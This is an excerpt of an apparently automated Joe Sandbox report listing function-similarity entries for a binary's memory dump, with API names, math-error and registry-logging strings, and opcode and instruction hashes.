                                                                                                                  • Instruction Fuzzy Hash: 6C217C71E0D1C645FB68B9289454B7C91819F49330FD84A33CE0E873D2DEDEA9C14131
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                  • Opcode ID: 703e831fcde42ecc4aa7784432d7fd0331f3ac24d1e9fedbd279c4e7797a8ef3
                                                                                                                  • Instruction ID: 2b7cb6f59c97dd537ffa95b96c15b7f77f778647404fc5b0ad58a829babcc963
                                                                                                                  • Opcode Fuzzy Hash: 703e831fcde42ecc4aa7784432d7fd0331f3ac24d1e9fedbd279c4e7797a8ef3
                                                                                                                  • Instruction Fuzzy Hash: D2114F62808E84C2D3119F1CE4417AEB3B0FF9A369F905326EBC817264DF6AD156C704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                  • Opcode ID: 6451bf9a0787ee7e3fbc2e4680b43665db0457fe4742dfdb35c5a895bdf1735a
                                                                                                                  • Instruction ID: 2733b0b0bcb5b81a135af01dda13bef493df3fc4a300cfa4d29f3319fc843d86
                                                                                                                  • Opcode Fuzzy Hash: 6451bf9a0787ee7e3fbc2e4680b43665db0457fe4742dfdb35c5a895bdf1735a
                                                                                                                  • Instruction Fuzzy Hash: 3AF02C66808E8482D311DF28A4006AFB370FF9A399F605227EBC927624DF69D1028710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                  • Opcode ID: f0cc35a3023ab0765aad32f209e1640c18de46f0afe3c809ef87c71ae9ddbc4d
                                                                                                                  • Instruction ID: 1ef37cd21dc0a8fecd9a163eaabb75b5f70c20c8cd6bb6cf2b09e6cddc719b5a
                                                                                                                  • Opcode Fuzzy Hash: f0cc35a3023ab0765aad32f209e1640c18de46f0afe3c809ef87c71ae9ddbc4d
                                                                                                                  • Instruction Fuzzy Hash: 52F02866808E8482D311DF28A4006AFB370FF9E399FA05227EBC927665DF6DD1068710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                  • Opcode ID: 7fc79935e1c96b175120206bcf42f550eab6264ab818878e534cf198e4de55d6
                                                                                                                  • Instruction ID: 231b791cc3aaee9957863b4e89ab6d8f2cbfd9b099d5604ee09d2ab16713983e
                                                                                                                  • Opcode Fuzzy Hash: 7fc79935e1c96b175120206bcf42f550eab6264ab818878e534cf198e4de55d6
                                                                                                                  • Instruction Fuzzy Hash: 16F02866808E8482D311DF28A4006AFB370FF9A399FA05227EBC927624DF69D1028B10
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fprintf
                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                  • Opcode ID: 3caf50f11d581963b8c73ebfee371e78415e78a0bb41e99ac7e1e7c5d0da35c7
                                                                                                                  • Instruction ID: 0946c4b80a21e0bb56518e8ae2c85d25099918d5af36196457847181cca88281
                                                                                                                  • Opcode Fuzzy Hash: 3caf50f11d581963b8c73ebfee371e78415e78a0bb41e99ac7e1e7c5d0da35c7
                                                                                                                  • Instruction Fuzzy Hash: 3CF0FB66808F8482D311DF18A4006ABB371FF9E799F605327EFC927625DF69D1468710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                  • Opcode ID: 99640af28f7d5e42eb5dbfc31f0b3563d5e2e68895e8b1d74a9c3510cd1f53b0
                                                                                                                  • Instruction ID: f77b4c551b0dc08c3a4a7bb9821355d57e301fbf8ab5f6928adababf4909870b
                                                                                                                  • Opcode Fuzzy Hash: 99640af28f7d5e42eb5dbfc31f0b3563d5e2e68895e8b1d74a9c3510cd1f53b0
                                                                                                                  • Instruction Fuzzy Hash: 84E065A2A1864680F750FF00B8609BCA210BB80BA4EC00133DD5E076A09EACA989D328
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                  • Opcode ID: 4e6d1565804c22a665bfade4e9e6dbc149f290daedc0b59019cb7242f4fc810f
                                                                                                                  • Instruction ID: 6e52113683ab7f4046208eb6ab696d316b0fcddf2d3782fc45260885a8475b21
                                                                                                                  • Opcode Fuzzy Hash: 4e6d1565804c22a665bfade4e9e6dbc149f290daedc0b59019cb7242f4fc810f
                                                                                                                  • Instruction Fuzzy Hash: 34E06DA2A1864640F711FF00BC209BCA214EB407A4EC00033DD1E076909EACA689D318
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                  • Opcode ID: 5e363c31e7291c556b444d04a48b444271ae06b21462efffc657dfadcfa4f260
                                                                                                                  • Instruction ID: 34c0505a90c6e1c31a400e56e8b2f250e680734079f501e71d8d76af5052e7c9
                                                                                                                  • Opcode Fuzzy Hash: 5e363c31e7291c556b444d04a48b444271ae06b21462efffc657dfadcfa4f260
                                                                                                                  • Instruction Fuzzy Hash: 1BE06DA2A1864641F710FF00B8109BCA210AB407A4EC00033DD1E476909EACA589D328
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                  • Opcode ID: 52f7967ad7d3ea4520bf204a5273323589eb95eac63699c98f2bddd83d47c0c1
                                                                                                                  • Instruction ID: 8a9d11554837b9ad8bea4e49625c1552129935ea394e293f2715b66e02deaf01
                                                                                                                  • Opcode Fuzzy Hash: 52f7967ad7d3ea4520bf204a5273323589eb95eac63699c98f2bddd83d47c0c1
                                                                                                                  • Instruction Fuzzy Hash: 72E06DA2A1864640F710BF00BC10ABCA210BB407A0EC00033DD1D076909EACA589D318
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                  • Opcode ID: c0f50a01de371026f01078a7e3fa67e47d07c01d698f57e1af9b6f61bfdee31a
                                                                                                                  • Instruction ID: a0d64c8901cb2bc32e115ab767d052fac707609101df478451644c6cafdad52a
                                                                                                                  • Opcode Fuzzy Hash: c0f50a01de371026f01078a7e3fa67e47d07c01d698f57e1af9b6f61bfdee31a
                                                                                                                  • Instruction Fuzzy Hash: 91E06DA2A1864644F710FF00B8209BCA210AB407A5EC00133DD1E076919EACA589D318
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                  • Opcode ID: b5bd019dd0bf83654245c40b92904aadd96d1c3966090d27f7e1cfcb4b26eff6
                                                                                                                  • Instruction ID: 6f635f9cc9a1b37edb8f662aaa9a1c46cffca228a92bc46c44edc08042b301bf
                                                                                                                  • Opcode Fuzzy Hash: b5bd019dd0bf83654245c40b92904aadd96d1c3966090d27f7e1cfcb4b26eff6
                                                                                                                  • Instruction Fuzzy Hash: 0DE06DA1A0868780E710BF00B8509BCA214BF507A4E804037DD4E577649EACA585D264
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                  • Opcode ID: e089e3e974d44456e3f3c7475c2e7e02398b4e49e340276aeff23f47b426e8ab
                                                                                                                  • Instruction ID: 85bfe76e1f3145904ee903e352b97beb76961eb9e7d3bda732e2d75c8071ce23
                                                                                                                  • Opcode Fuzzy Hash: e089e3e974d44456e3f3c7475c2e7e02398b4e49e340276aeff23f47b426e8ab
                                                                                                                  • Instruction Fuzzy Hash: 0BE092A1A0C68781E710FF40BC109BCE214FF50BA4FC04037DD4D577649EACE584D264
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                  • Opcode ID: e2f1209c0628b930416376927d3e8b07767f95333bc7b115f0ddec6875fed09a
                                                                                                                  • Instruction ID: ffa0f22fc83de1f216dd8ffbaa53104a3c58f270221fc24fa31f33f5a1967dc9
                                                                                                                  • Opcode Fuzzy Hash: e2f1209c0628b930416376927d3e8b07767f95333bc7b115f0ddec6875fed09a
                                                                                                                  • Instruction Fuzzy Hash: D1E09AA2A0C68780E711FF00BC109BCE218FF90BA4FC04037DD8E577A49EACE684D264
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                  • Opcode ID: 1647a98ab6f5dbe32d1f5291f3d2ce6e53f674afaf45352e8b91d784a789bfe1
                                                                                                                  • Instruction ID: d42ffc7175be411188c5f56ca80a5b4e0466d2330114ecafe63fa3353b4fad23
                                                                                                                  • Opcode Fuzzy Hash: 1647a98ab6f5dbe32d1f5291f3d2ce6e53f674afaf45352e8b91d784a789bfe1
                                                                                                                  • Instruction Fuzzy Hash: 88E09AA2A0C68780E710BF00FC10ABCE218FF90BA0FC04037DD8D577A49EACE588D264
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                  • Opcode ID: d51e24225b9ee83d6d96fe7a7a25a0d9b23eded9cce2d7450df1aec798d1e490
                                                                                                                  • Instruction ID: e6fe8da08ac69c0697b5ddce83765aab10181caee78ab738fed29be57190086a
                                                                                                                  • Opcode Fuzzy Hash: d51e24225b9ee83d6d96fe7a7a25a0d9b23eded9cce2d7450df1aec798d1e490
                                                                                                                  • Instruction Fuzzy Hash: BFE09AA2A0C68B80E710FF00BC109BCE218FF90BA4FC04037DD8E577A59EACE584D264